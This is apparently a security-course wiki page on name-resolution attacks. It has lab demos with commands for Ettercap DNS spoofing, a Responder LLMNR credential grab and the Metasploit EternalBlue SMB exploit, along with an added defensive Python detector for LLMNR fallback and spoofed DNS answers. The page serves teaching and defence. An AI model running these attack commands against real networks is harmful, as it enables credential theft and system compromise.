Network Vulnerabilities: Name Resolution - Paiet/SEC-335 GitHub Wiki

  • Name resolution exploits
    • DNS cache poisoning
      • Tricking clients into accepting the attacker's answers as if they came from the legitimate DNS server
        • Redirects targets to malicious sites
      • DEMO: Ettercap for DNS poisoning
        1. Modify the etter.dns file to contain fake A records
           • Copy from Kali /Tools/fakeArec.txt
           • Change the IP to match the IP of bWAPP
        2. `ettercap -T -q -i eth0 -P dns_spoof -M arp /10.0.0.225//`
           • -T = text-only interface
           • -q = quiet; do not display packet contents
           • -i = set the interface
           • -P = choose the plugin to use (here dns_spoof)
           • -M = perform a MITM attack (here ARP-based); /10.0.0.225// is the target specification
        3. Browse to facebook from the target
        4. Log in to facebook/bWAPP and see the user/pass info in Kali
    • NetBIOS name service (NBT-NS)
    • LLMNR
      • Windows will try Link-Local Multicast Name Resolution if DNS fails
        • It does this by multicasting the query
      • An attacker's tool answers the multicast query
        • Tools include
          • responder
          • Metasploit
          • MITMf
        • Tells Windows to authenticate to get access to the resource
          • Creds are grabbed
            • User just gets an error
      • DEMO: Responder cred grab
        1. `responder -I eth0 -v`
        2. Victim requests a resource; DNS fails to resolve the name, so Windows falls back to LLMNR
           • `net use \\server1\share1`
        3. You are probably seeing the username and password hash at this point
           • If the user enters a username/password, you WILL see that get captured
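Added example (my own code, not part of the course notes or of any tool above): a defender-side check over constructed packet records for the two behaviours this section describes, a Windows host falling back to LLMNR multicast, and a DNS A answer that disagrees with a known-good baseline, which is what a dns_spoof-style poisoning produces on the wire. The packet tuples, names and addresses (the lab's 10.0.0.x range, the documentation address 203.0.113.10) are constructed; LLMNR and DNS share the DNS wire format, so one parser covers both.

```python
import struct
LLMNR_PORT, LLMNR_GROUP = 5355, "224.0.0.252"  # LLMNR = UDP 5355 to this multicast group

def build(name, ips=(), txid=0x1234):
    """Construct a minimal DNS/LLMNR query (no ips) or A-record response (with ips)."""
    q = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    msg = struct.pack("!HHHHHH", txid, 0x8180 if ips else 0, 1, len(ips), 0, 0) + q + b"\x00\x01\x00\x01"
    for ip in ips:  # owner name = pointer to offset 12, type A, class IN, TTL 60, 4-byte rdata
        msg += b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes(int(o) for o in ip.split("."))
    return msg

def parse_name(buf, off):
    """Read an uncompressed label sequence; returns (dotted name, offset after it)."""
    labels = []
    while buf[off] != 0:
        n = buf[off]
        labels.append(buf[off + 1:off + 1 + n].decode("ascii", "replace"))
        off += 1 + n
    return ".".join(labels), off + 1

def parse_message(payload):
    """Return (is_response, queried name, list of A-record IPs) for one DNS/LLMNR message."""
    _, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", payload[:12])
    name, off = parse_name(payload, 12)
    off, ips = off + 4, []                        # skip QTYPE and QCLASS
    for _ in range(ancount):                      # owner name: compression pointer or labels
        off = off + 2 if (payload[off] & 0xC0) == 0xC0 else parse_name(payload, off)[1]
        rtype, _, _, rdlen = struct.unpack("!HHIH", payload[off:off + 10])
        if rtype == 1 and rdlen == 4:
            ips.append(".".join(str(b) for b in payload[off + 10:off + 14]))
        off += 10 + rdlen
    return bool(flags & 0x8000), name, ips

def audit(packets, baseline):
    """packets: (src_ip, dst_ip, dst_port, payload); baseline: {name: expected_ip}."""
    alerts = []
    for src, dst, dport, payload in packets:
        is_resp, name, ips = parse_message(payload)
        if dport == LLMNR_PORT and dst == LLMNR_GROUP and not is_resp:
            alerts.append(("llmnr-fallback", f"{src} asked for '{name}' over LLMNR multicast"))
        elif is_resp and name in baseline and any(ip != baseline[name] for ip in ips):
            alerts.append(("dns-answer-mismatch", f"{src} answered {name} -> {ips}, expected {baseline[name]}"))
    return alerts

# Constructed sample traffic (not a real capture): LLMNR fallback, a correct answer, then a spoofed one.
BASELINE = {"www.facebook.com": "203.0.113.10"}
SAMPLE_PACKETS = [
    ("10.0.0.50", LLMNR_GROUP, LLMNR_PORT, build("server1")),
    ("10.0.0.1", "10.0.0.50", 49152, build("www.facebook.com", ["203.0.113.10"])),
    ("10.0.0.225", "10.0.0.50", 49152, build("www.facebook.com", ["10.0.0.225"])),
]
```

Running `audit(SAMPLE_PACKETS, BASELINE)` yields one llmnr-fallback alert (the kind of query Responder answers) and one dns-answer-mismatch alert (the answer a poisoned client would act on); the legitimate resolver's answer is silent.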
  • SMB exploits
    • Windows Server Message Block service
    • Has many exploits available
    • Metasploit has built-in exploits
      • CVE-2017-0143 EternalBlue
      • Module usage in msfconsole:

        ```
        use exploit/windows/smb/ms17_010_eternalblue
        show targets
        set TARGET <target-id>
        show options
        set RHOST <target IP>
        exploit
        ```
        